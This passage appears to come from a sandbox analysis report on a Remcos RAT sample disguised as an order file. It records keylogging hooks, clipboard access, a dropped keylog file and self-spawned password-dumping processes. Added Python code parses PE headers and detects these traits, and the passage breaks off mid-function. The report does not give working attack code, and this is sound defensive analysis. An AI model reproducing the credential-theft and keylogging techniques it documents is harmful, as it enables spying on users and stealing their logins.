              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv2901.tmp.5.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
              Source: bhv2901.tmp.5.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
              Source: bhv2901.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: orders_PI 008-01.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv2901.tmp.5.drString found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\orders_PI 008-01.exe
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0041183A OpenClipboard,GetLastError,DeleteFileW
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud

Source: Yara match | File source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Source: initial sample | Static PE information: Filename: orders_PI 008-01.exe
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00401806 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_004018C0 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004016FD NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004017B7 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00402CAC NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00402D66 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_004034A2 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_6FF41B5F
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344BB5C1
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344C7194
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044B040
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0043610D
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00447310
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044A490
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040755A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0043C560
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044B610
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044D6C0
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_004476F0
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044B870
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044081D
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00414957
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_004079EE
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00407AEB
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044AA80
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00412AA9
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00404B74
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00404B03
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044BBD8
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00404BE5
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00404C76
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00415CFE
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00416D72
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00446D30
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00446D8B
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00406E8F
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00405038
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0041208C
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004050A9
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0040511A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0043C13A
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004051AB
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00449300
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0040D322
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0044A4F0
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0043A5AB
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00413631
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00446690
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0044A730
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004398D8
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004498E0
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0044A886
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0043DA09
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00438D5E
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00449ED0
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0041FE83
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00430F54
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004050C2
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004014AB
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00405133
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004051A4
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00401246
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_0040CA46
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00405235
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004032C8
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004222D9
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00401689
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00402F60
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: String function: 00416760 appears 69 times
Source: orders_PI 008-01.exe | Static PE information: invalid certificate
Source: orders_PI 008-01.exe, 00000003.00000003.1775848112.00000000035B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe, 00000003.00000003.1775575621.00000000035B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.000000003449B000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe, 00000003.00000003.1756993058.0000000034101000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe, 00000003.00000003.1757596772.00000000035A2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe | Binary or memory string: OriginalFileName vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe | Binary or memory string: OriginalFilename vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe, 00000007.00000002.1761634918.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
Source: orders_PI 008-01.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@9/15@1/3
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_004034A2 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File created: C:\Program Files (x86)\Common Files\kvindagtigt.ini
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File created: C:\Users\user\kretekniske.ini
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-BHLA3T
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File created: C:\Users\user\AppData\Local\Temp\nsx9F9D.tmp
Source: orders_PI 008-01.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
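The two "Static PE information" lines in this section (the file characteristics RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE and the .text section flags IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ) are decoded from the COFF file header and the section table. The parser below is an added example and is not part of the Joe Sandbox report or of the sample: it walks DOS header, PE signature, COFF header and section table with nothing but struct, and is run against a constructed minimal PE32 header (not the analysed binary) that carries exactly the flag combination printed above. The writable-and-executable section check is a general triage heuristic added here; the report does not claim the file has such a section.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits (subset, per the PE/COFF specification)
IMAGE_FILE_FLAGS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}

# IMAGE_SECTION_HEADER.Characteristics bits (subset)
IMAGE_SCN_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def decode_flags(value, table):
    """Names of the bits set in value, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_headers(data):
    """DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, _ts, _psym, _nsym, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    # The section table begins immediately after the optional header.
    sect_off = coff + 20 + opt_size
    sections = []
    for i in range(nsect):
        off = sect_off + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        scn_chars = struct.unpack_from("<I", data, off + 36)[0]  # Characteristics at +36
        sections.append((name, decode_flags(scn_chars, IMAGE_SCN_FLAGS)))
    return {
        "machine": machine,
        "characteristics": decode_flags(chars, IMAGE_FILE_FLAGS),
        "sections": sections,
    }


def writable_executable_sections(parsed):
    """Triage heuristic: sections mapped both writable and executable."""
    return [name for name, flags in parsed["sections"]
            if "IMAGE_SCN_MEM_EXECUTE" in flags and "IMAGE_SCN_MEM_WRITE" in flags]


def build_sample_pe(text_flags=0x60000020):
    """Constructed minimal PE32 header (not a real binary, no code bytes)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH",
                                   0x014C,    # IMAGE_FILE_MACHINE_I386
                                   2,         # NumberOfSections
                                   0, 0, 0,   # timestamp, symbol table pointer/count
                                   224,       # SizeOfOptionalHeader for PE32
                                   0x010F)    # the flag combination the report prints
    opt = struct.pack("<H", 0x10B) + b"\0" * 222                   # PE32 magic, rest zeroed
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x1000, 0x400,
                       0, 0, 0, 0, text_flags)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x1000, 0x2000, 0x200, 0x1400,
                       0, 0, 0, 0, 0xC0000040)                     # data | read | write
    return dos + coff + opt + text + data


if __name__ == "__main__":
    info = parse_pe_headers(build_sample_pe())
    print("Characteristics:", ", ".join(info["characteristics"]))
    for name, flags in info["sections"]:
        print(name, ", ".join(flags))
    print("W+X sections:", writable_executable_sections(info))
```

The same walk applies to a real file read from disk; only the section table and COFF header are touched, so it also works on truncated or padded samples as long as the headers are intact. A section that is both writable and executable is not proof of packing, but it is the first thing to look at when a report also flags changed section rights at runtime.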
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: orders_PI 008-01.exe, 00000003.00000002.3907921678.0000000033F20000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: orders_PI 008-01.exe, 00000005.00000002.1773908926.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000003.1768964426.00000000027BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: orders_PI 008-01.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File read: C:\Users\user\Desktop\orders_PI 008-01.exe
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit (graph_6-33208)
Source: unknown | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"
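The process tree above is the part of this report worth turning into a detection: the sample spawns three copies of itself, each with /stext "<temp file>", which is the text-output switch of the NirSoft password-recovery tools whose traces (nirsoft.net strings, OriginalFilename mspass.exe in process memory, the SQLite logins schema) appear elsewhere in the report. Together with the dropped C:\ProgramData\remcos\logs.dat and the Rmc-BHLA3T mutex, that gives three independent signals. The code below is an added example, not part of the Joe Sandbox report: detection logic run over constructed Sysmon-style events modelled on the lines above. The event shape, the PIDs, and the assumption that the Rmc- mutex prefix is stable across Remcos builds are mine, not the report's.

```python
import re
from collections import Counter

# NirSoft recovery tools (WebBrowserPassView, Mail PassView, ...) write their
# results to a file when started with /stext <path>.
STEXT_RE = re.compile(r'\s/stext\s+"(?P<out>[^"]+)"', re.IGNORECASE)
# Keylog file path observed in this report.
REMCOS_LOG_RE = re.compile(r'\\remcos\\logs\.dat$', re.IGNORECASE)
# Mutex prefix observed in this report; assumed (not verified here) to be
# stable across Remcos builds.
REMCOS_MUTEX_RE = re.compile(r'\\Rmc-[A-Z0-9]+$')

SAMPLE = r"C:\Users\user\Desktop\orders_PI 008-01.exe"

# Constructed events mirroring the report's process tree, plus one benign process.
# PIDs 5, 6, 7 are chosen to match the report's process indices; they are not real.
EVENTS = [
    {"type": "process_create", "pid": 3, "ppid": 1, "image": SAMPLE,
     "parent_image": SAMPLE, "cmdline": '"' + SAMPLE + '"'},
    {"type": "process_create", "pid": 5, "ppid": 3, "image": SAMPLE, "parent_image": SAMPLE,
     "cmdline": '"' + SAMPLE + r'" /stext "C:\Users\user\AppData\Local\Temp\zwewot"'},
    {"type": "process_create", "pid": 6, "ppid": 3, "image": SAMPLE, "parent_image": SAMPLE,
     "cmdline": '"' + SAMPLE + r'" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"'},
    {"type": "process_create", "pid": 7, "ppid": 3, "image": SAMPLE, "parent_image": SAMPLE,
     "cmdline": '"' + SAMPLE + r'" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"'},
    {"type": "process_create", "pid": 9, "ppid": 2,
     "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
    {"type": "file_create", "pid": 3, "path": r"C:\ProgramData\remcos\logs.dat"},
    {"type": "mutex_create", "pid": 3, "name": r"\Sessions\1\BaseNamedObjects\Rmc-BHLA3T"},
]


def detect(events):
    """Return one alert dict per matching event, plus one aggregate alert
    when a single parent launches two or more /stext dumpers."""
    alerts = []
    dumpers_per_parent = Counter()
    for ev in events:
        if ev["type"] == "process_create":
            m = STEXT_RE.search(ev["cmdline"])
            if m:
                dumpers_per_parent[ev["ppid"]] += 1
                alerts.append({
                    "rule": "nirsoft_stext_dump",
                    "pid": ev["pid"],
                    "output": m.group("out"),
                    # Dumper runs inside a copy of the parent's own image, i.e. the
                    # tool was injected into a self-spawned child rather than dropped.
                    "self_spawn": ev["image"].lower() == ev["parent_image"].lower(),
                })
        elif ev["type"] == "file_create" and REMCOS_LOG_RE.search(ev["path"]):
            alerts.append({"rule": "remcos_keylog_file", "pid": ev["pid"], "path": ev["path"]})
        elif ev["type"] == "mutex_create" and REMCOS_MUTEX_RE.search(ev["name"]):
            alerts.append({"rule": "remcos_mutex", "pid": ev["pid"], "name": ev["name"]})
    for ppid, n in dumpers_per_parent.items():
        if n >= 2:
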